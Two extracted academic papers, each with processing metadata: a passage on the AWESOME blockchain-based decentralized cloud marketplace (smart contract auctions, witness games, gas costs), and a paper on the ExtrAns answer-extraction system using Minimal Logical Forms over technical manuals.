- SLA interoperability and guarantee challenge. The time-critical application constraints, e.g., for processing media contents during crowd news reporting and real-time decision-making, require the profound optimization of the application logic and components and the guarantee of the service quality of the cloud infrastructure, including both virtual machines and network connectivities. The diverse SLA terms among providers and the uncertainties in the SLA guarantee make performance optimization difficult. \(^2\)http://www.oraclize.it/ • Difficulties in verifying the incentive models and setting of the witness games in a decentralized marketplace. The business logic in a decentralized marketplace is often realized by smart contracts, which are supposed to be immutable after being deployed on blockchains. However, any careless design or mistake may cause unexpected loss. • Virtual infrastructure automation challenge. When an application involves multi providers or data centers, the provisioning of the virtual infrastructure, deployment of the software platform and application components (often in terms of containers), monitoring, and adaptation of the application need to be ideally automated. However, the diverse Application Programming Interfaces (APIs) from different providers and the interoperability issues across those providers make the automated provisioning and deployment a challenge and result in high complexity for monitoring the runtime infrastructure quality and detecting SLA violations and adaptation of the infrastructure. There are already many tools and academic studies focused on the challenges listed above. For example, Cloudsstorm [11] addresses DevOps resource management from the perspective of improving application programmability. BASIC [4] is an Ethereum blockchain-based urban agent simulator. It combines agent-based simulation with smart contract technology to verify the feasibility of using blockchain in simulated urban scenarios. By contrast, the authors in [10] and [1] use different auction models to achieve optimal cloud provider selection. While blockchain-based auction models have great potential for the cloud marketplace, most existing solutions focus only on the design of the auction models without considering the trusted execution of cloud SLAs. Although there are tools existing in different areas for different purposes (e.g., cloud/blockchain automation, DevOps, and blockchain simulation), there is no such a package solution to build a decentralized cloud marketplace and meet users’ various application needs. 3 THE AWESOME FRAMEWORK To tackle the current challenges in the decentralized cloud marketplace, we propose the AWESOME framework. The AWESOME software architecture consists of novel combinations of state-of-the-art technologies in DevOps, agent-based modeling, game theory, and blockchain. The proposal aims to tackle those challenges and to achieve the following objectives: • Objective 1: Improve the provider selection in a decentralized ecosystem by developing an automated service auction framework to enable dynamic business relations between a consumer(s) and providers and establish an SLA. • Objective 2: Improve the service quality and SLA’s trustworthiness between consumer(s) and providers by establishing a decentralized dynamic witness mechanism to monitor the quality violations and automate the procedure for SLA compensation and payment. 
- Objective 3: Improve the efficiency of smart contract validation by developing social behavior-based simulation components to evaluate and validate the impact of smart contracts for auctions and witnesses.

- Objective 4: Improve the continuous DevOps efficiency of an application in a decentralized cloud ecosystem by providing an integrated software framework to enhance the infrastructure management components in the existing DevOps stack.

The AWESOME framework will be tested on both permissionless and permissioned blockchains.

3.1 Architecture Overview

The AWESOME framework consists of four subsystems in response to the proposed objectives, as shown in Figure 2:

(1) The Interactive Business Scenario guided Smart Contract SIMulator (IBSCSIM) provides a smart contract business process simulation environment that connects both on-chain and off-chain activities. It aims to verify the feasibility of using blockchain in different use case scenarios (e.g., crowd journalism and pathology data sharing) through agent-based simulation that considers the communication among different smart contract agents. More specifically, IBSCSIM designs simulation scenarios regarding 1) performance issues, 2) smart contract security issues, and 3) incentive model selection, to provide users with overall DevOps guidance.

(2) On-Demand Auction for Service Providers (ODASP) provides an auction-based service provider selection solution. This subsystem first diagnoses the use case requirements and then selects the most suitable auction model and algorithm to make the auction process effective. The management of the auction process and the enforcement of the service fee payment (in the form of cryptocurrency) are all executed on the blockchain, ensuring that the whole auction is open and trustworthy. Finally, ODASP also audits bidder candidates to ensure that malicious providers cannot join the auction process.

(3) Decentralized Customizable Witness Game (DCWG) provides a game theory-based incentive framework to manage decentralized auction witnesses. First, an appropriate number of witness candidates is selected in an unbiased way to perform off-chain monitoring of federated cloud SLAs. DCWG then designs a game-theoretic incentive mechanism (e.g., different payoff functions) so that selected witnesses make correct judgments in order to win more profits. The subsystem also audits the witnesses' reputations to reward or restrict their participation in future monitoring activities.

(4) Decentralized Automated Service Orchestration (DASO) provides tools and APIs for application developers to set up the necessary blockchain infrastructure. More specifically, it is responsible for automating the planning and provisioning of the blockchain infrastructure and the generation and deployment of business/SLA smart contracts. The DASO subsystem also monitors and diagnoses smart contracts and the underlying blockchain infrastructure at runtime to provide effective adaptation.

3.2 Technical Details

As shown in Figure 3, the overall workflow of the AWESOME framework can be described as the following steps. First of all, an **AWESOME manager** calls the DASO subsystem to plan and provision the blockchain infrastructure required for the simulation. The **AWESOME end user** then calls the IBSCSIM subsystem to initiate an agent-based on-chain simulation for the current use case.
After that, IBSCSIM starts to simulate offline behaviors and generate on-chain predictions, which provides users with guidance on the auction and witness settings in ODASP and DCWG. Meanwhile, the DASO subsystem automatically generates auction, witness, and SLA smart contracts to ensure trustworthy interaction between the different participants. Next, the decentralized **service providers** and **witnesses** register in the ODASP and DCWG subsystems, respectively. When there are enough registered candidates, the **AWESOME manager** and the **AWESOME auctioneer** start the screening process to find qualified providers and witnesses. Finally, the **selected providers** collaborate to provide federated cloud services, and the **witnesses** start to monitor the SLA to win profits. When the cloud service ends, the service price and witness fee are paid and enforced with cryptocurrency using the blockchain. In the entire AWESOME workflow, IBSCSIM guides the selection of the auction and witness game models and the on-chain deployment of the use case, while ODASP selects candidate providers through an auction process.

4 PROOF OF CONCEPT VALIDATION

In this section, we present a proof of concept validation of the AWESOME framework to demonstrate its feasibility. To meet the requirements of building a decentralized cloud marketplace, we designed three smart contracts on the Ethereum blockchain (i.e., an auction contract, a witness contract, and an SLA contract) to support trustworthy and fair interactions between the different stakeholders. In the AWESOME framework, we leverage a smart contract factory to manage and generate subcontracts instead of developing the different contracts separately, as this is a more secure and efficient approach.

4.1 Smart Contract Interactions

The sequence diagram below shows the interaction between the contract factory and the different subcontracts. First, an AWESOME manager calls the contract factory to create a new auction contract. Next, an auction contract with an auction rule customized to the business requirements is built to support transparency and automation of the auction process. Decentralized service providers can then register and submit their bids for services as commitments on the blockchain. The auction contract then selects the winning providers based on the highest k bids and generates k SLA contracts, one for each winning provider. When the auction is settled (note that the services have not been delivered yet), the AWESOME manager calls the contract factory again to generate a witness contract that contains customized incentive mechanisms to encourage truth-telling witnesses. More details about the game theory-based design of the witness payoffs can be found in our previous research [12]. The winning providers can then start to deliver their cloud services off-chain, while the witnesses monitor all the services; if the QoS satisfies the requirements in the SLA contract, there is no violation, otherwise there is a violation. The result of the service monitoring is also returned to the auction contract and determines the status of the auction.

4.2 Cost Analysis

Regarding the implementation details of the AWESOME contracts, we first designed a set of function interfaces in each smart contract, as shown in Table 1. These functions have built-in access control mechanisms; only specific stakeholder groups can access and call them. Next, we measured the transaction fee (ether) of each function interface, as shown in Figure 5.
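Since the measured fees follow directly from the gas figures in Table 1, it helps to recall the standard Ethereum relation between gas consumption and fee; the 50 gwei gas price used in the example below is only an illustrative assumption, not a value reported in this paper:

\[ \text{fee (ether)} = \text{gas used} \times \text{gas price (gwei)} \times 10^{-9} \]

For instance, at an assumed gas price of 50 gwei, Setup Auction (171,707 gas) would cost about \(171{,}707 \times 50 \times 10^{-9} \approx 0.0086\) ether, whereas Calculate Witness Fee (1,108,723 gas) would cost roughly 0.055 ether. Because the fee is proportional to the gas consumption at a fixed gas price, the different submission modes (i.e., different gas prices) shift the absolute fee level but not the relative ranking of the interfaces.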
Specifically, three transaction submission modes (i.e., Low, Average, and High) were tested. By analyzing the testing results, we can see that the transaction fees of most function interfaces stay at a relatively low level (less than 0.01 ether), except for three special cases, namely Place Bids (auction contract), Generate SLA Contracts (auction contract), and Calculate Witness Fee (witness contract). These function interfaces are also the ones with the highest gas consumption, as shown in Table 1.

Table 1: The Gas Consumption of Each Function Interface in AWESOME Smart Contracts

<table>
<thead>
<tr><th>Smart Contract</th><th>Access Control</th><th>Function Interface</th><th>Gas Consumption</th></tr>
</thead>
<tbody>
<tr><td rowspan="7"><strong>Auction Contract</strong></td><td>Customer</td><td>Setup Auction</td><td>171707</td></tr>
<tr><td>Provider</td><td>Bidder Register</td><td>87310</td></tr>
<tr><td>Provider</td><td>Submit Bids</td><td>134473</td></tr>
<tr><td>Provider</td><td>Reveal Bids</td><td>110190</td></tr>
<tr><td>Customer</td><td>Place Bids</td><td>435951</td></tr>
<tr><td>Customer</td><td>Withdraw Deposit</td><td>44185</td></tr>
<tr><td>Customer</td><td>Generate SLA Contracts</td><td>997266</td></tr>
<tr><td rowspan="5"><strong>Witness Contract</strong></td><td>Witness</td><td>Witness Register</td><td>172679</td></tr>
<tr><td>Witness</td><td>Submit Reports</td><td>110992</td></tr>
<tr><td>Witness</td><td>Reveal Reports</td><td>150549</td></tr>
<tr><td>Customer</td><td>Calculate Witness Fee</td><td>1108723</td></tr>
<tr><td>Witness</td><td>Withdraw Witness Fee</td><td>22468</td></tr>
<tr><td rowspan="7"><strong>SLA Contract</strong></td><td>Customer</td><td>Check Auction Settled</td><td>49571</td></tr>
<tr><td>Provider</td><td>Set Customer</td><td>44074</td></tr>
<tr><td>Provider</td><td>Set Service Duration</td><td>27266</td></tr>
<tr><td>Provider</td><td>Publish Service</td><td>34587</td></tr>
<tr><td>Provider</td><td>Setup SLA</td><td>55275</td></tr>
<tr><td>Customer</td><td>Accept SLA</td><td>71536</td></tr>
<tr><td>Provider</td><td>Cancel SLA</td><td>26202</td></tr>
</tbody>
</table>

Note that in reality, different auction models have different rules; in this section, a reverse first-price sealed-bid auction (FPSBA) model is used as an example to illustrate the AWESOME framework workflow, and other auction models can easily be integrated into the smart contracts. The estimated transaction confirmation durations for the three submission modes are 16 minutes, 2 minutes and 19 seconds, and 30 seconds, respectively; the gas price data was collected on April 30, 2021 from https://etherscan.io/gastracker.

It is worth noticing that the AWESOME framework aims to develop a highly modular software architecture for a decentralized cloud ecosystem. Some subsystem features (e.g., the cross-chain simulator in IBSCSIM and the blockchain planner in DASO) are still under development, and we leave them as part of our future work. In the future, we will continue to test our framework and demonstrate its feasibility in two ongoing industrial projects (i.e., EU ARTICONF and CLARIFY).
ACKNOWLEDGMENTS

This work has been partially funded by the European Union's Horizon 2020 research and innovation programme, through the ARTICONF project (grant agreement No 825134), the ENVRI-FAIR project (grant agreement No 824068), the BLUECLOUD project (grant agreement No 862409), and by LifeWatch ERIC. The project is also partially supported by the China Scholarship Council (CSC).

REFERENCES
{"Source-Url": "https://pure.uva.nl/ws/files/70612822/BANDIT2021_3_.pdf", "len_cl100k_base": 5053, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 21996, "total-output-tokens": 6122, "length": "2e12", "weborganizer": {"__label__adult": 0.00046324729919433594, "__label__art_design": 0.0005755424499511719, "__label__crime_law": 0.0009236335754394532, "__label__education_jobs": 0.0011796951293945312, "__label__entertainment": 0.00017690658569335938, "__label__fashion_beauty": 0.00025963783264160156, "__label__finance_business": 0.007457733154296875, "__label__food_dining": 0.0005216598510742188, "__label__games": 0.001247406005859375, "__label__hardware": 0.001514434814453125, "__label__health": 0.0012369155883789062, "__label__history": 0.0005402565002441406, "__label__home_hobbies": 0.0001856088638305664, "__label__industrial": 0.0009508132934570312, "__label__literature": 0.0004482269287109375, "__label__politics": 0.0007386207580566406, "__label__religion": 0.0004837512969970703, "__label__science_tech": 0.32568359375, "__label__social_life": 0.00017201900482177734, "__label__software": 0.038421630859375, "__label__software_dev": 0.615234375, "__label__sports_fitness": 0.0003285408020019531, "__label__transportation": 0.0008401870727539062, "__label__travel": 0.0003273487091064453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26923, 0.06977]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26923, 0.10309]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26923, 0.8871]], "google_gemma-3-12b-it_contains_pii": [[0, 1534, false], [1534, 6510, null], [6510, 11560, null], [11560, 16510, null], [16510, 18998, null], [18998, 23332, null], [23332, 26923, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1534, true], [1534, 6510, null], [6510, 11560, null], [11560, 16510, null], [16510, 18998, null], [18998, 23332, null], [23332, 26923, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26923, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26923, null]], "pdf_page_numbers": [[0, 1534, 1], [1534, 6510, 2], [6510, 11560, 3], [11560, 16510, 4], [16510, 18998, 5], [18998, 23332, 6], [23332, 26923, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26923, 0.17164]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
0888916ae223c65d08f92bab9bf0bf1afb7b9a92
Towards Answer Extraction: An Application to Technical Domains

Fabio Rinaldi* and James Dowdall* and Michael Hess* and Diego Mollà† and Rolf Schwitter†

Abstract. The shortcomings of traditional Information Retrieval are most evident when users require exact information rather than relevant documents. This practical need is pushing the research community towards systems that can exactly pinpoint those parts of documents that contain the information requested. Answer Extraction (AE) systems aim to satisfy this need. This paper presents one such system (ExtrAns) which works by transforming documents and queries into a semantic representation called Minimal Logical Form (MLF) and derives the answers by logical proof from the documents. MLFs use underspecification to overcome the problems associated with a complete semantic representation and offer the possibility of monotonic, non-destructive extension.

1 Introduction

The classical type of 'information need' solved by existing Information Retrieval (IR) applications has a number of shortcomings which new techniques such as Information Extraction and Answer Extraction aim at solving. Traditionally, it is assumed that IR systems have to find supporting documents on a particular topic, and the problem of locating the relevant information within those documents is not dealt with. In fact, many authors have observed that traditional Information Retrieval should rather be called "Document Retrieval". The typical application scenario for IR techniques could be considered that of "Essay Writing", while the new approaches aim at a different scenario which could be called "Problem Solving". Recently, some sections of the research community have focused their interest on systems which can not only locate relevant documents, but also pinpoint the exact piece of information that the user is interested in. During the past decade, the Message Understanding Conferences have been a major arena for development in this field. The concept of Information Extraction has been gradually developed and refined, so that today this is considered a separate and autonomous area of research. Typically, such systems can extract specific types of information predefined by the creators of the system. The simpler applications, like Named Entity extraction, have enjoyed considerable success. More complex applications, like template extraction and scenario extraction, did not seem capable of improving significantly after reaching levels which were deemed interesting but not fully satisfactory.
A fundamental problem with Information Extraction applications of the complex type (Template Extraction, Scenario Extraction) is that the system is normally tailored to the predefined templates and cannot easily adapt to different templates, as would normally be required by a change of domain or the specific interests of the users (as defined by the templates). Answer Extraction (also called Question Answering, or QA) is a recently developed field which tries to solve some of the problems described above. Answer Extraction systems typically allow the user to ask arbitrary questions and aim at retrieving, in a given corpus, a small snippet of text which provides an answer. Research in this area has been promoted in the past couple of years in particular by the QA track of the TREC competitions [18, 21]. The participants in this competition have the opportunity to measure how well their systems can retrieve answers to a predefined set of questions from a very large collection of documents. They run their system on the given questions and return for each a ranked list of five answers in the form of pairs [document identifier, answer string]. The returned data are then evaluated by human assessors, who for each string have to decide whether it contains an answer to the question and whether the given document supports that answer. One of the limitations of such evaluations has been that questions about rule-like or definitional knowledge (i.e. generic, intensional questions), such as "How do you stop a Diesel engine?" or "How does a Diesel engine work?" or "What is a typhoon?", have not received much attention so far.¹ In fact, it is precisely this type of question that users would direct at technical documents. Besides, there has been a strong focus on very large volumes of text, as typically seen in IR applications. In our own research we prefer to concentrate on "low volume/high value" data, with a gradual increase in volumes to follow later.

In this paper we present an Answer Extraction (AE) system (section 2) and its application to two different domains. After describing in detail the syntactic (section 3) and semantic (section 4) processing components of the system, we will show how Answer Extraction is performed (section 5) and describe a comparison with a baseline IR system (section 6). Finally, we discuss the results and briefly survey related work (section 7).

¹ While only a small number of them were included in the QA track of TREC 8 and 9, in the most recent TREC 10 a significant number has been included.
* University of Zurich, Institute of Computational Linguistics, Winterthurerstrasse 190, CH-8057 Zurich, Switzerland. Email: {rinaldi, hess, dowdall}@ifi.unizh.ch
† Department of Computing, Macquarie University, Sydney, Australia. Email: {diego, rolfa}@ics.mq.edu.au

2 The Architecture of ExtrAns

ExtrAns is a complex system which comprises several different modules (see figure 1), written in different programming languages. A given document collection is processed in an off-line stage, but the query is processed on-line. The same linguistic analysis is applied in both stages, transforming everything into a semantic representation called Minimal Logical Form (MLF). The basic architecture has been tested over two contrasting technical domains. Originally, answers to arbitrary user questions were extracted from the Unix documentation files ("man pages").
The system covers a set of more than 500 unedited man pages, and answers questions such as "which command can duplicate files?" The flexibility of the MLFs allows the extraction of relevant answers ("cp does not copy a file onto itself"), not only strictly logical answers ("cp copies files"). The system can be tested on the project web page.⁷ More recently, the system has been used over the Airplane Maintenance Manuals (AMM) of the Airbus A320. The highly technical nature of this domain, as well as an SGML-based format and a much larger size (120MB) than the Unix documentation, provided an important test-bed for the scalability and domain independence of the system.

Compared to the QA track of TREC, these two domains represent small to medium sized document collections. An obvious advantage is the opportunity to process the entire document collection, rather than just selected paragraphs, in an off-line stage. As the data sets continue to grow in size, this approach will quickly become too computationally expensive and paragraph indexing methodologies will need to be used. Currently, there is a paragraph selection procedure based on a loose matching between query concepts and the stored semantic representation of the document. User queries are processed on-line and converted into MLFs (possibly expanded by synonyms) and proved by refutation over the document knowledge base. Pointers to the original text attached to the retrieved logical forms allow the system to identify and highlight those words in the retrieved sentence that contribute most to that particular answer [14]. An example of the output of ExtrAns can be seen in figure 3. When the user clicks on one of the answers provided, the corresponding document is displayed with the relevant passages highlighted.

When no direct proof for the user query is found (strict mode), the system is capable of relaxing the proof criteria in a stepwise manner. First, hyponyms will be added to the query terms, thus making the query more general but still logically correct. If that fails, the system will attempt approximate matching, in which the sentence with the highest overlap of predicates with the query is retrieved. The (partially) matching sentences are scored and the best fits are returned. In the case that even this method does not find sufficient answers, the system will attempt keyword matching, in which syntactic criteria are abandoned and only information about word classes is used. This last step corresponds approximately to a traditional passage-retrieval methodology with consideration of the POS tags. It is important to note that, in the strict mode, the system finds only logically correct proofs (within the limits of what MLFs can represent; see below), i.e. it is a "high precision" AE system.

3 Syntactic Processing

The syntactic analysis uses the robust dependency-based parser Link Grammar (LG) [16], which is able to handle a wide range of syntactic structures [17]. Syntactically unresolvable ambiguities, such as prepositional phrase attachment or gerund and infinitive constructions, are treated with a corpus-based approach [2]. Sentence-internal pronouns are dealt with using the anaphora resolution algorithm of [11]. LG uses linkages to describe the syntactic structure of a sentence (see figure 2). Links connect pairs of words in such a way that the linking requirements of each word in the sentence are satisfied, that the links do not cross, and that the words form a connected graph.
Despite some extensions at the lexical and syntactic level, processing the frequent occurrences of multi-word, domain-specific terminology proved problematic for LG. The addition of a new module, capable of identifying these previously detected terms, ensures that they are parsed as single syntactic units. This reduces the complexity of parsing the AMM by as much as 50%. Also, the output of LG has been extended to include the direction of the linkages, as this information is vital for anaphora resolution and semantic analysis.

⁷ http://www.ifi.unizh.ch/cl/extrans/

Figure 2. An example of LG output
Figure 3. An example of the output of ExtrAns - query window

As LG returns all possible parses, it is necessary to disambiguate among them [13]. The two possibilities for the prepositional phrase attachment returned in figure 2 will be reduced to (b) by the disambiguator, as this linkage correctly identifies the dependency relations. One link connects the subject of the sentence to the wall; the wall functions as a dummy word at the beginning of every sentence and has linking requirements like any other word. A subject link connects the transitive verb connects with the subject on the left and the verbal head on the right. The transitive verb and its direct object external antenna, which acts as the head of a noun phrase, are connected by an object link. A further link connects the verb to the modifying prepositional phrase. Finally, a link connects the preposition to with its object ANT connection. These dependency relations are used to generate the semantic representation of the sentence.

LG has a robust component for parsing complex or ungrammatical structures, so that ExtrAns may still produce MLFs, extended with special predicates that mark the unprocessed words as "keywords". Sentences that contain nominalizations are dealt with using a small hand-crafted resource (a lexicon of nominalizations)³ which helps us to cope with the most important cases, e.g. "to edit <a text>" ⇔ "editor of <a text>" ⇔ "<text> editor". The system also includes hyponymy and synonymy relations based on the WordNet model.

4 Semantic Analysis

The Minimal Logical Forms (MLFs) of the documents and queries are the fundamental expression of their meaning within ExtrAns. The generation of MLFs is robust enough to treat very complex (even ungrammatical) sentences [14], and facilitates the semantic comparison of queries against documents. MLFs represent a powerful combination of selected reification and underspecification. An important facet of the MLFs results from the flat expressions produced through reification, as proposed for instance in [9] or [5]. Where Hobbs' ontologically promiscuous semantics reifies each predicate, MLFs restrict reification to only certain predicates: objects, eventualities (events or states) and properties. In this way event modifiers, negations, higher order verbs, conditionals and higher order predicates can be represented. MLFs use the main syntactic dependencies between words to express verb-argument relations, as well as modifier and adjunct relations. Extensive underspecification excludes complex quantification, tense and aspect, temporal relations, plurality and modality.
One of the effects of this kind of underspecification is that several natural language queries, although slightly different in meaning, produce the same logical form. The MLFs are expressed as conjunctions of predicates with all the variables existentially bound with wide scope. For example, the MLF of the sentence "A coax cable connects the external antenna to the ANT connection" is:

(1)  holds(o1),
     object(coax_cable, o2, [v3]),
     object(external_antenna, o3, [v4]),
     object(ANT_connection, o4, [v5]),
     evt(connect, o1, [v3, v4]),
     prop(to, p1, [o1, v5]).

ExtrAns identifies three multi-word terms, translated into (1) as the objects: v3, a coax cable; v4, an external antenna; and v5, an ANT connection. The entity o1 represents the 'connect' event involving two arguments, the coax cable and the external antenna. This reified event, o1, is used again in the final clause to assert that the event happens 'to' v5 (the ANT connection). This is the utility of reification: it yields the additional arguments o2, o3, o4 and o1 as hooks for additional modifiers to be attached to the entities they denote. Reification can be used to monotonically increment the underspecified MLF (1), without embedding arguments (preserving a flat structure) or destructively rewriting the original MLF. For example, the expression "A coax cable securely connects the external antenna to the ANT connection" changes nothing in the original MLF, but additionally asserts prop(securely, p8, [o1]), i.e. that the event o1 is secure. (1) only exploits the reified event, but other, more complex sentences will need to refer to reified objects (non-intersective adjectives) or reified properties (adjective-modifying adverbs).

5 Answer Extraction

ExtrAns finds the answers to the questions by forming the MLFs of the questions and then running Prolog's default resolution mechanism to find those MLFs that can prove the question. The logical form of the question "How is the external antenna connected?" is:

(2)  holds(v1),
     object(external_antenna, o2, [v5]),
     evt(connect, v1, [v4, v5]),
     object(anonymous_object, v3, [v4]).

The variables introduced in a question MLF are converted into Prolog variables. The resulting MLF can be run as a Prolog query that will succeed provided that there has been an assertion in the text that the external antenna is connected to or by something. This something is the anonymous object of the query. A sentence identifier and a pointer (indicating the tokens from which the predicate has been derived) are attached to each predicate of an MLF in the knowledge base. This information matches against additional variables attached to the predicates in the question (not shown in the example above) and is eventually used to highlight the answer in the context of the document (see figure 3).
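As an illustration of the proof step, under the renderings of (1) and (2) given above and writing the question variables in upper case, as Prolog would, the query literal evt(connect, V1, [V4, V5]) unifies with the fact evt(connect, o1, [v3, v4]) from (1), binding

     V1 = o1    (the reified connect event)
     V4 = v3    (the coax cable)
     V5 = v4    (the external antenna)

holds(V1) is then satisfied by holds(o1), and object(external_antenna, _, [V5]) by object(external_antenna, o3, [v4]). Assuming that the anonymous-object predicate is allowed to match any object in the knowledge base, the anonymous object of the query resolves to the coax cable, which is precisely the piece of information the question is asking for.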
The use of Prolog resolution will find the answers that can logically prove the question, but given that the MLFs are simplified logical forms converted into flat structures, ExtrAns will find sentences that, logically speaking, may not be exact answers but are still relevant to the user's question, such as:

(3) a. "The external antenna must not be directly connected to the control panel."
    b. "Do not connect the external antenna before it is grounded."
    c. "The external antenna is connected, with a coax cable, to the ANT connection on the ELT transmitter."
    d. "To connect the external antenna use a coax cable."

The expressivity of the MLF is expanded through the use of meaning postulates of the type: if x is installed in y, then x is in y. This ensures that the query "Where are the equipment and furnishings?" extracts the answer "The equipment and furnishings are installed in the cockpit". In our view MLFs open up a potential path to a stepwise development of a question answering system by allowing monotonically incremental refinements of the representation without the need to destroy previous partial information. While MLFs specify the core meaning of sentences, they leave underspecified those aspects of semantics that are less relevant or too hard to analyse, for the time being.

6 Evaluation

In order to set up an evaluation framework for our system, we decided to use an IR system as a baseline, even if the standard measures of precision and recall are not ideal for an Answer Extraction system. In particular, recall is significantly less important than precision, as the aim of such a system is to provide (at least) one correct answer, rather than all the possible answers in a given collection. In the QA track of TREC a measure of precision that is commonly used is the Mean Reciprocal Rank (MRR). The rank of a given result is the position at which the first correct answer is found in the output list of the system. Over a given set of answers, MRR is computed as the mean of the reciprocals of the ranks for all the answers.

The particular evaluation that we present here is targeted at the new application in the AMM domain. We devised 100 questions by selecting interesting passages from the manual and formulating questions to which those passages could be an answer. The questions were submitted to both ExtrAns and the selected IR system (SMART). While in general ExtrAns retrieves a small number of answers, which can easily be checked manually, SMART retrieves a ranked list of documents. As manual inspection of all the documents retrieved by SMART would be impossible, we decided to set an arbitrary threshold (at 10), i.e. if no valid answer was contained in the first ten retrieved documents, we classified it as "Not Found". The diagram (figure 5) shows how many answers are found at each rank (1 to 5; answers from 6 to 10 are considered together). As can be seen, ExtrAns finds fewer answers than SMART (even ruling out all answers ranked > 10). Therefore recall would clearly be higher for SMART. However, in the majority of cases when ExtrAns does find the answer, it places it in the first position. Notice further that in some cases ExtrAns finds more than one valid answer for the same question (possibly in the same document).
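Written out, with Q the set of test questions and rank_i the rank at which the first correct answer to question i appears (the reciprocal being taken as 0 when no correct answer is returned, as is the usual TREC convention), the measure is:

\[ \mathrm{MRR} = \frac{1}{|Q|} \sum_{i=1}^{|Q|} \frac{1}{\mathrm{rank}_i} \]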
There are very few cases where an answer at a lower rank is correct while answers at higher ranks for the same question are not. It does happen that ExtrAns retrieves incorrect answers together with the correct one, but in that case the correct one is almost always ranked first. For the particular evaluation that we have presented, our system would obtain an MRR of 0.63, which is a very good result if compared with results obtained in TREC. However, we should stress that such a comparison is misleading, as our evaluation is far more restricted than those carried out in TREC. Besides, our system at the moment could not cope with very large volumes of data as seen in TREC. In general, this evaluation leads us to conclude that ExtrAns can provide far higher precision than a generic IR system, at the price of a smaller recall. Recall alone, however, is not interesting. In the scenario that we consider it is important to locate the precise answer quickly. Relevant documents that are ranked poorly are likely to remain unnoticed by the user.

⁴ We presented in [15] a different type of evaluation performed on the original application for the Unix man pages.

7 Discussion

IR techniques can be used to implement QA systems by applying them at the passage or sentence level. Portions of text with the maximum overlap of question terms contain, with a certain probability, an answer. Standard preprocessing steps (removing stop words, "stemming" word forms, weighting keywords, etc.) can be used to refine this basic method. However, systems that do not employ linguistic processing techniques and stick to the "bag of words" approach inherited from IR will never be able to distinguish different strings that contain the same words in different syntactic configurations and that therefore encode different meanings, such as "absence of evidence" and "evidence of absence".

Results from the first two TREC QA tracks [19, 21] showed clearly that traditional IR techniques are not sufficient for satisfactory Question Answering. When the answer is restricted to a very small window of text (50 bytes), systems that relied only on those techniques fared significantly worse than systems that employed some kind of language processing. More successful approaches employ special treatment for some terms (e.g., named entity recognition [7, 3]) or a taxonomy of questions [22, 1, 6, 10]. The standard methods used in IR to rank hits according to their relevance are no substitute for these techniques. Relevance in IR is almost invariably determined on the basis of the weights assigned to individual terms, and these weights are computed from term frequencies in the documents (or passages) and in the entire document collection (the tf/idf). Since this measure is blind to syntactic (and hence semantic) relationships, it does not distinguish between hits that are logically correct and others.

It is interesting to observe how some of the systems that obtained good results in the QA track of TREC have gradually moved away from bag-of-words approaches and into NLP techniques, using semantic information. For instance, Falcon [8] (the best performing system in TREC 9) performs a complete analysis of a set of selected texts for each query and of the query itself and creates, after several intermediate steps, a logical representation inspired by the notation proposed by Hobbs (on which we also base our MLFs).
The syntax analysis in Falcon is based on a statistical parser [4], while we use a dependency parser that computes all syntactically possible structures, which we then filter according to a combination of hand-crafted rules and the Brill and Resnik disambiguation procedure [2]. A similarity between ExtrAns and Falcon is that both build a semantic form starting from a dependency-based representation of the questions. As for the type of inferencing used, while ExtrAns uses standard deduction (proving questions over documents), Falcon uses an abductive backchaining mechanism, which can be used to provide a "logical proof" as a justification for the answer. Further, it has an interesting module (which so far we do not have) capable of caching answers and detecting question similarity. In an environment where the same question (in different formulations) is likely to be repeated a number of times, such a module can significantly improve the (perceived) performance of a QA system.

8 Conclusion

The QA track of TREC has proved that Natural Language Processing techniques cannot be dispensed with if relevant answers have to be pointed out precisely. The meaning of both queries and documents must be taken into account, by syntactic and semantic analysis. Our fully functioning AE system, ExtrAns, shows that such applications are within the reach of present-day technology.

REFERENCES
{"Source-Url": "http://www.zora.uzh.ch/id/eprint/19093/1/Rinaldi_Dowdall_Hess_2002.pdf", "len_cl100k_base": 5495, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 19336, "total-output-tokens": 7188, "length": "2e12", "weborganizer": {"__label__adult": 0.0005083084106445312, "__label__art_design": 0.0009636878967285156, "__label__crime_law": 0.0010347366333007812, "__label__education_jobs": 0.00806427001953125, "__label__entertainment": 0.000545501708984375, "__label__fashion_beauty": 0.00036835670471191406, "__label__finance_business": 0.0006732940673828125, "__label__food_dining": 0.0005669593811035156, "__label__games": 0.0014705657958984375, "__label__hardware": 0.00102996826171875, "__label__health": 0.0010786056518554688, "__label__history": 0.0007138252258300781, "__label__home_hobbies": 0.00015652179718017578, "__label__industrial": 0.0006284713745117188, "__label__literature": 0.00640106201171875, "__label__politics": 0.0006742477416992188, "__label__religion": 0.0007696151733398438, "__label__science_tech": 0.416015625, "__label__social_life": 0.00036025047302246094, "__label__software": 0.0980224609375, "__label__software_dev": 0.45849609375, "__label__sports_fitness": 0.0003409385681152344, "__label__transportation": 0.0007834434509277344, "__label__travel": 0.00030303001403808594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 